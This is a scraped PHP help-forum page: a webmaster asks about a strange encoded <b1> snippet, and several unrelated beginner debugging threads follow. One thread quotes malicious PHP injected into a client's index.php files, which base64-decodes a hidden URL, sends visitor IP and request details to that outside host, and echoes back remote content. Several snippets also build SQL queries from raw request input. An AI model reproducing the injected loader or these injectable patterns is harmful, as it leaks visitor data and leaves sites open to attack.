PHP - Strange <b1> Html Tag?
I recently noticed some odd HTML appear in some of the websites I host. Not all of them are run on a CMS but the majority (but not all) are running through the same FTP account.
I've searched everywhere for documentation, forums, notes on this particular exploit but haven't been able to find anything. Essentially, there is a small HTML snippet (see below) that appears right before the </html> tag. It's really odd and the characters inside the <b1> are all different strings. Here's the code that's appearing:

Code:
<b1><!--6FY8rhRLeNoNyVsOwiAQBdAdca0PXE5DYVKngSkZrsG4ej2/B80UJt+FlytuMcbnHbmqHEcoMnS3r9aaRshnw5QN+TT+F7NMUFqviTLgXCnuyei6vU3WY3lArcgn9Ff/AVyxJcZ=--></b1>

It's evident that the code is some type of exploit but I'm not sure how deep this goes. Anyone heard of anything like this, or have any idea of the potential issues that could occur?

Thanks for your help!
-suess0r

Similar Tutorials

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<?php
session_start();
ini_set('display_errors', 'On');
error_reporting(-1);
//Connect to Database and Check cookies for logged in user
$db = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS);
mysql_select_db(MYSQL_DB_NAME);
if (!isset($_GET['act'])) {
    if (!isset($_POST['act'])) {
        $act = 'idx';
    }
    if (isset($_POST['act'])) {
        $act = mysql_real_escape_string($_POST['act']);
    }
}
if (isset($_GET['act'])) {
    $act = mysql_real_escape_string($_GET['act']);
}
If ($act == 'login' && $_GET['CODE']=='1') {
    $usernameUsed = mysql_real_escape_string($_POST['Username']);
    $passwordUsed = mysql_real_escape_string($_POST['Password']);
    $SaltPassword = MEMBER_PASS_SALT_1.$passwordUsed.MEMBER_PASS_SALT_2;
    $HashPassword = md5($SaltPassword);
    $QueryLogin = "SELECT * FROM ".MEMBER_LOGIN_TABLE." WHERE username='{$usernameUsed}' AND password='{$HashPassword}'";
    $LoginResult = mysql_query($QueryLogin);
    if (mysql_num_rows($LoginResult) > 0) {
        $UserID = mysql_result($LoginResult, 0, 'user_id');
        $Id = uniqid();
        $IdQry = "UPDATE ".MEMBER_LOGIN_TABLE." 
SET `unique_id`='{$Id}' WHERE user_id='{$UserID}'";
        $IdRes = mysql_query($IdQry, $db);
        setcookie('RAYTH_MEMBER_ID', $Id, time()+2592000);
    }
}
If ($act == 'logout' && $_GET['CODE'] == '1') {
    setcookie('RAYTH_MEMBER_ID', "", time()-3600);
}
if (isset($_COOKIE['RAYTH_SKIN'])) {
    $Skin = $_COOKIE['RAYTH_SKIN'];
} Else {
    $Skin = 'redskin';
}
if (isset($_COOKIE['RAYTH_MEMBER_ID'])) {
    $Id = mysql_real_escape_string($_COOKIE['RAYTH_MEMBER_ID']);
    $MemIdQry = "SELECT user_id FROM ".MEMBER_LOGIN_TABLE." WHERE `unique_id`='{$Id}'";
    $memidres = mysql_query($MemIdQry, $db);
    $memidnum = mysql_num_rows($memidres);
    If ($memidnum < 1) {
        setcookie('RAYTH_MEMBER_ID', '', time()-3600);
    } Else {
        $memid = intval(mysql_result($memidres, 0, 'user_id'));
    }
}
if (isset($memid)) {
    $query_meminfo = "SELECT * FROM ".MEMBER_PROFILE_TABLE." WHERE `user_id`='{$memid}'";
    $query_result = mysql_query($query_meminfo, $db);
    $MemName = mysql_result($query_result, 0, 'display_name');
    $MemGroup = mysql_result($query_result, 0, 'Group');
    $AdsEnabled = mysql_result($query_result, 0, 'ads_enabled');
    $UserLevel = intval(mysql_result($query_result, 0, 'user_level'));
    $LevelQuery = "SELECT group_level FROM ".MEMBER_GROUPS." WHERE group_id='{$MemGroup}'";
    $LevelResult = intval(mysql_result(mysql_query($LevelQuery, $db), 0, 'group_level'));
    If ($UserLevel < $LevelResult) {
        $MemLevel = $LevelResult;
    } Else {
        $MemLevel = $UserLevel;
    }
} else {
    $MemLevel = 0;
    $AdsEnabled = 'yes';
}
?>
<html>
<HEAD>
<title>Rayth.Info ..::Home::..</title>
<?php
$File = './skins/'.$Skin.'/'.$Skin.'.php';
If (file_exists($File)) {
    include("./skins/{$Skin}/{$Skin}.php");
} Else {
    include("../skins/{$Skin}/{$Skin}.php");
}
?>

Ok, this code is the Headers code which checks if the user is logged in, what skin to load etc. It is also used in the forum (so used in home and forum) via php include. Now something strange happens. 
If I use the home page to login (Rayth.Info) it logs me in for both the home page and the forum (rayth.info/forum). Now, if I then logout, and go to the forum, relogin, it doesn't log me in on the home page. Both pages use the same login/logout/register forms by php include and the same headers.php by include so I can't see any reason why this is happening. The cookie is obviously being set when the user logs in since it sees them logged in on one page.

So I have a client that wants me to add a function to her site that when she clicks a mailto href on a page to spawn an email child, some canned data chunk gets inserted into a form's textarea field.. something like: "Email sent to blah@blah.com on 8/14/14".
I'm drawing a blank on how this might be handled.. any ideas out there??

I have a form here that redirects to: "proc/edit.php?edit=<?php echo urlencode($function_name);?>"

Code:
<?php require_once("includes/functions.php");?>
<?php
session_start();
if (isset($_SESSION["user_name"])) {
    require_once("includes/connection.php");
    if(isset($_GET['functions'])){
        $function_name=$_GET['functions'];
        $function_type=$_GET['type'];
        $query = "SELECT * FROM functions WHERE function_name = '{$function_name}' ";
        $result = mysql_query($query,$connection);
        if($result){
            $row = mysql_fetch_array($result, MYSQL_ASSOC);
            $function_description=$row['function_description'];
?>
<html>
<head>
<title>Edit Your function</title>
</head>
<body>
<form name="edit_function_n" action="proc/edit.php?edit=<?php echo urlencode($function_name);?>" method="get">
Edit Your function name : <input type="text" name="new_function_name"/><br/><br/>
Edit Your description here :<br/><br/>
<textarea name="new_function_description" rows="10" cols="30"></textarea><br/><br/>
<input type="submit" value="Change" /><br/><br/>
</form>
</body>
</html>
<?php
        } elseif(!$result){
            redirect("errors/error_db.html");
        }
    }
} else {
    redirect("main.php?error=log");
}
//close connection!
mysql_close($connection);
?>

And I have a proc php file that UPDATEs the database with the new form variables and then redirects to show.php

Code:
<?php require_once("../includes/functions.php");?>
<?php
session_start();
if (isset($_SESSION["user_name"])) {
    require_once("../includes/connection.php");
    //ignore this , this is for deleting!
    if(isset($_GET['delete'])){
        //warning : using urldecode here is wrong cuz $_GET[var]; is already decoded!
        $function_to_delete=$_GET['delete'];
        $function_type=$_GET['functions'];
        $query="DELETE FROM functions WHERE function_name='{$function_to_delete}' ";
        $result = mysql_query($query, $connection);
        if(!$result){redirect("../errors/error_db.html");}
        elseif($result){ redirect("../show.php?functions={$function_type}&delete=suc"); }
    }
    //the place for edit ! 
    elseif(isset($_GET['edit'])){
        $old_function_name=$_GET['edit'];
        $new_function_name=$_POST['new_function_name'];
        $new_function_description=$_POST['new_function_description'];
        $query="UPDATE functions SET function_name='{$new_function_name}', function_description='{$new_function_description}' WHERE function_name='{$old_function_name}' ";
        $result = mysql_query($query, $connection);
        if(!$result){redirect("../errors/error_db.html");}
        elseif($result){redirect("../show.php?functions='{$function_type}'&edit=suc");}
    }
} else {
    redirect("../main.php?error=log");
}
?>
<?php
//close connection!
mysql_close($connection);
?>

The problem is I get redirected to a strange link that never existed and that I never pointed to: /proc/edit.php?new_function_name=($new_function_name)&new_function_description=($new_function_description) with the variables replaced with their values and with no database update whatsoever! I tried a lot with it with no result. Could someone help me out here!

Ok, not sure what the problem is....hard to explain. I am trying to set up a login script but I get the normal: Warning: session_start() [function.session-start]: Cannot send session cache limiter error code. I have no white space above to cause the problem. I have used this same code written by Jpmaster77 on a number of sites. The strange thing is it also messed up a couple of my css text boxes. See the difference:
http://www.monstersgonewild.ca/index.php - Problem
http://www.monstersgonewild.ca/index1.php - Without session()
I would post the code of the original page but it is 600+ lines and growing. Anybody have any ideas?

So I am currently coding a database connection class and I have encountered very strange behavior from my script. 
base.class.php:

Code:
<?php
class base{
    private $settings;
    function get_settings(){
        $settings["dbhost"] = 'localhost';
        $settings["dbuser"] = '*****';
        $settings["dbpass"] = '*****';
        $settings["dbname"] = 'core';
        return $settings;
    }
}
?>

database.class.php

Code:
<?php
require_once 'base.class.php';
class database extends base{
    private $query_now;
    private $link;
    public function __construct(){
        $settings = base::get_settings();
        $dbhost = $settings["dbhost"];
        $dbuser = $settings["dbuser"];
        $dbpass = $settings["dbpass"];
        $dbname = $settings["dbname"];
        $this->link = mysql_connect($dbhost, $dbname, $dbpass) or die ("Could not connect to the mysql database");
        mysql_select_db($dbname, $this->link) or die ("Could not select the database");
    }
    function query($query){
        $this->query_now = $query;
        return mysql_query($query, $this->link);
    }
    function getArray($result){
        return mysql_fetch_array($result);
    }
}
?>

When I try to create an instance of the database class, I get a mysql_connect error. I have tried to echo my array and it seems that correct information is being passed over. Now the strange thing is if I remove my password from the base class I don't get a mysql_connect error but this time instead I get "Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'core'@'localhost' (using password: YES) " In case you are wondering whether my mysql database user has a password, the answer is: yes for sure... (Also I have tried to set up a simple script for connecting to my database and everything worked fine) So any ideas?

I'm returning a table row that contains information about a file, but it seems in IE versions older than 10, it is cutting off some of the returned json when being used.
The data is being returned properly as seen in the following json:
{"file_name":"<i class='video'><\/i> <a href=\"\/Development\/test(4).mp4\" class=\"is_file\" target=\"_blank\">test(4).mp4<\/a>"}

But when you use it, it cuts off the html. A simple alert will return

</i> test(4).mp4</a>

and the same when appending it and the sort. It is also happening for another part of HTML that is being returned properly in the json. It is working for everything else that is returned. I have been searching around for a very long time trying to find why this is happening. Has anyone other than me encountered this?

I'm installing and testing a web application, and I'm having a strange bug that annoys me because it doesn't make any sense and also it doesn't really affect the web functionality:

if($_POST["eliminar"]==""){
    $consulta='SELECT * FROM impressora where Activa=0';
    $result=mysql_query($consulta,$conexion);
    echo"<table align=CENTER class='sample'>";
    echo"<p align=center>LLISTA D'IMPRESSORES INACTIVES.</p>";
    printf("<th>MODEL</th><th>MARCA </th>");
    while($fila=mysql_fetch_array($result,MYSQL_ASSOC)){
        echo"<tr>";
        echo "<td>" . $fila["Model"] . "</td>";
        echo "<td>" . $fila["Marca"] . "</td>";
        echo"</td>";
        if($_SESSION["admin"]!=0){
?>
<form method= "post" ACTION="impressores_inactives.php?idr=<?php echo($fila["Id_impressora"])?>">
<td colspan="2"><INPUT TYPE ="SUBMIT" NAME="eliminar" VALUE="Eliminar"></td>
</form></td>
<?php
        }
        echo "</tr>";
    }
    echo"</table>";
}else{
    echo 'eliminado';
    echo $_POST["eliminar"];
    // Delete the printer from the database
    $consulta="delete from impressora where Id_impressora='".$_GET["idr"] ."'";
    $result=mysql_query($consulta);
    echo "<meta http-equiv=Refresh content=\" ; url=../Impressores/impressores_inactives.php\">";
}

The problem is that php says that eliminar is undefined, and if I test $_POST it says it's empty. See that eliminar is the name of the submit post and it's checked for a function that deletes an item. The problem is that the script is actually working. I can delete the printer but with that error... 
and if I test the value of eliminar it is always empty. Ask for any other explanation without a problem, the code is in Spanish.

Hi everyone, I uploaded a web site 2 months ago and it worked well. Since 1 week ago, it shows me this error and I don't know what the problem is. I have completely uploaded my web site again but it hasn't made a difference. This is the address birjand-niazmandi.com . I have uploaded class.phpmailer.php again but I can't understand what the problem is. How can I solve it? Thanks

Hey guys, First of all thanks in advance for all the help you can give me. I'm using a php shopping script called plaincart to create a webstore. All is fine but the admin part is not working properly. When I go to http://localhost/admin it redirects to http://localhost/admin/admin/login.php The index.php is in the root of the server and the admin files are in a folder called admin... What is wrong? Please tell me if you need any code. Thank you

OK, this is a strange one I am hoping someone can help with. I have a file with a heap of functions which work fine. This file is included in my other files, and the function to display the content is called. For example I include the master file in guestbook.php, which calls showGuestbook(). Same with contact.php, it calls showContact(); etc. The file is outside the web root of the website calling it. So I went to add another function called downloadFile(). When I try to call the function, it gives me the "call to undefined function" error. I have tried renaming it to a few different things, same error. So I thought there could be a brace error somewhere in the file. This is the strange bit.... When I put that function at the top of the file, the page seems to fail to parse. None of the functions are available... 
The function so far is simply:

function downloadFile() {
    echo "Download File";
}

Can anyone shed some light on this strange behaviour, especially the errors that occur just because I move the code higher up the file.

I have something strange going on with sessions set after a user logs in. After posting the form, the following code (only part of the log in script) correctly assigns the user's ID to $_SESSION['id'] but after a while it starts showing up as the user's level ($_SESSION['level']). I have rechecked all of my code to see if something mistakenly assigns the level to $_SESSION['id'] but everything seems fine. I am going to rewrite the log in script today, as I am sure that I can streamline it but wondered if anyone can give any advice on what is happening here to make sure I do not fall into the same trap! Thanks Steve

$username = mysql_escape_string($_POST['Lname']);
$password = mysql_escape_string(md5($_POST['Lpassword']));
$search = mysql_query("SELECT userid, username, password, active, level FROM users WHERE username like binary '".$username."' AND password='".$password."' AND active='1'") or die(mysql_error());
$match = mysql_num_rows($search);
$level = mysql_fetch_assoc($search);
if($match > 0) //The username and password is correct
{//START MANUAL LOGIN & SET SESSION VARIABLES
    $_SESSION['user'] = $username;
    $_SESSION['level'] = $level['level'];
    $_SESSION['loggedin'] = '1';
    $_SESSION['id'] = $level['userid'];

Current time when testing was: 1291064453
I run the following:
echo date('m/d/y', strtotime('first day', 1291064453));
Expecting: 11/1/10
What I actually get: 11/30/10
Can anyone explain this?

When I used the Amazon API to capture product details using the well known code (http://www.chipdir.nl/amazon/aws_signed_request.phps), it made this error, and consequently lots of CPU usage which made my server go down. 
Code:
[14-Mar-2011 20:38:01] PHP Warning: simplexml_load_string() [<a href='function.simplexml-load-string'>function.simplexml-load-string</a>]: uestProcessingTime>0.0009990000000000</RequestProcessingTime></OperationRequest> in /home/laptop/public_html/jewelryaccessories.us/amazon.php on line 52

Line 51 - 60 of amazon.php is

Code:
// parse XML
$pxml = simplexml_load_string($response);
if ($pxml === False) {
    return False; // no xml
} else {
    return $pxml;
}

I hope this is in the correct section. My host and I have spent many hours on this and can find no reason for this error. Only MSIE creates the problem and it only occurs on the index page on load and on refresh. All other browsers are fine.

Scenario: on loading in IE 7, 8 I get these error messages

Error messages

Error Log -
[Sat Nov 12 23:49:44 2011] [error] [client 60.230.xxx.xx] File does not exist: /hsphere/local/home/MYDOMAIN/MYDOMAIN.com.au/none

Transfer Log -
203.26.xxx.xx - - [12/Nov/2011:23:49:00 +0000] "GET /none HTTP/1.1" 302 233 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

Always followed by ......
203.26.xxx.xx - - [12/Nov/2011:23:49:00 +0000] "GET /error_page.php HTTP/1.1" 200 13196 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

Although it calls GET /error_page.php it does not go to the error_page.php but loads the index page without any further errors. Any help is greatly appreciated. Cheers

The code below was inserted into every single index.php on one of my clients' sites. It went through and every single index.php page (in each folder) had the following code put in. It was strange. As far as I can tell there are no FTP logs, besides my own IP. 
This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a full security audit yet. What could have caused this? The weird thing is it's not loading it into the very top of the file.. the security.inc.php is my file.. and somehow they always get inserted below that file. But the <? is inserted right after it. I also don't generally use the <? shorthand, that was his previous code.. but that entire <? block that has the hack attempt is very strange. Any advice on how this is generally done, and anyone with similar issues?

Code:
<? require_once('security.inc.php'); ?><?
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {$sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

Can anyone help? 
The date is pulling through without a value, shown in bold below.

`Timesheet_start_date` >= '2011-02-10 00:00:00' AND `Timesheet_end_date` <= '1970-01-01 00:00:00' ORDER BY id DESC

Here is my code:

Code:
$smalldate = $_POST['small'];
$largedate = $_POST['large'];
$types[] = (isset($_POST['small']) && strlen(trim($_POST['small'])) > 0) ? "`Timesheet_start_date` >= '".date('Y-m-d',strtotime($smalldate))." 00:00:00'" : '';
$types[] = (isset($_POST['large']) && strlen(trim($_POST['large'])) > 0) ? "`Timesheet_end_date` <= '".date('Y-m-d',strtotime($largedate))." 00:00:00'" : '';

I've echoed the $largedate and there is a value in there?

Using phpMyAdmin I loaded 6 test records with the id set to auto_increment and it loaded all the data correctly with id # 1-6. Then from somewhere it got the number 333353 and auto_increments it as the value for the id. So now I have ids 1-6 and 333353, 333354, etc. For every record I add it increments it. I deleted all but records 1-6 and tried again but it has the last value of 3333xx stored somewhere and increments it. Deleted them again, closed the program, came back and it still does it.

I'm creating a function for executing a system command. The idea is to show the command return. I use pre to show it, so I created a general function iPre that echoes a string with that tag. The problem is that this code doesn't work.

function compComando($com) {
    return escapeshellcmd($com);
}
function ejecComando($com) {
    $return = passthru(compComando($com));
    if ($return) {
        return $return;
    } else {
        pe();
    }
}
function iPre($txt) {
    echo '<pre>';
    echo $txt;
    echo '</pre>';
}
iPre(ejecComando('dir C:'));

But if I call this simple code it works. Why?

echo '<pre>';
echo ejecComando('dir C:');
echo '</pre>';

Here it's shown well formatted, in the other no. I suppose that's something relating to passing the string to the function...?

I have the most simple loop ever on this earth and it's doing strange things. There are 6 rows in my cache table. 
I have a query to echo the rows onto the page with a loop. Now I'm trying to limit the rows returned to 1 row. Simples eh.

$FetchCacheq = mysql_query("SELECT * FROM cacheInfo LIMIT 1") or die('cache error');
<table width="480" border="0" cellpadding="0" cellspacing="5">
<tr>
<td colspan="2" valign="baseline"><strong>Caches you have found</strong></td>
</tr>
<?php do { ?>
<tr>
<td width="250" height="31" align="left" valign="middle"><?php echo $row['cacheName'];?></td>
<td width="230" align="left" valign="middle"><img src="/images/submit.png" width="20" height="20" /></td>
</tr>
<?php } while($row = mysql_fetch_assoc($FetchCacheq));?>
</table>

The problem I have is it's showing two rows. Here is the source code from the page

<table width="480" border="0" cellpadding="0" cellspacing="5">
<tr>
<td colspan="2" valign="baseline"><strong>Caches you have found</strong></td>
</tr>
<tr>
<td width="250" height="31" align="left" valign="middle"></td>
<td width="230" align="left" valign="middle"><img src="/images/submit.png" width="20" height="20" /></td>
</tr>
<tr>
<td width="250" height="31" align="left" valign="middle">Your Life in Their Hands</td>
<td width="230" align="left" valign="middle"><img src="/images/submit.png" width="20" height="20" /></td>
</tr>
</table>

As you can see one of the rows doesn't even have the cache name in it!!! Please help, I'm really confused.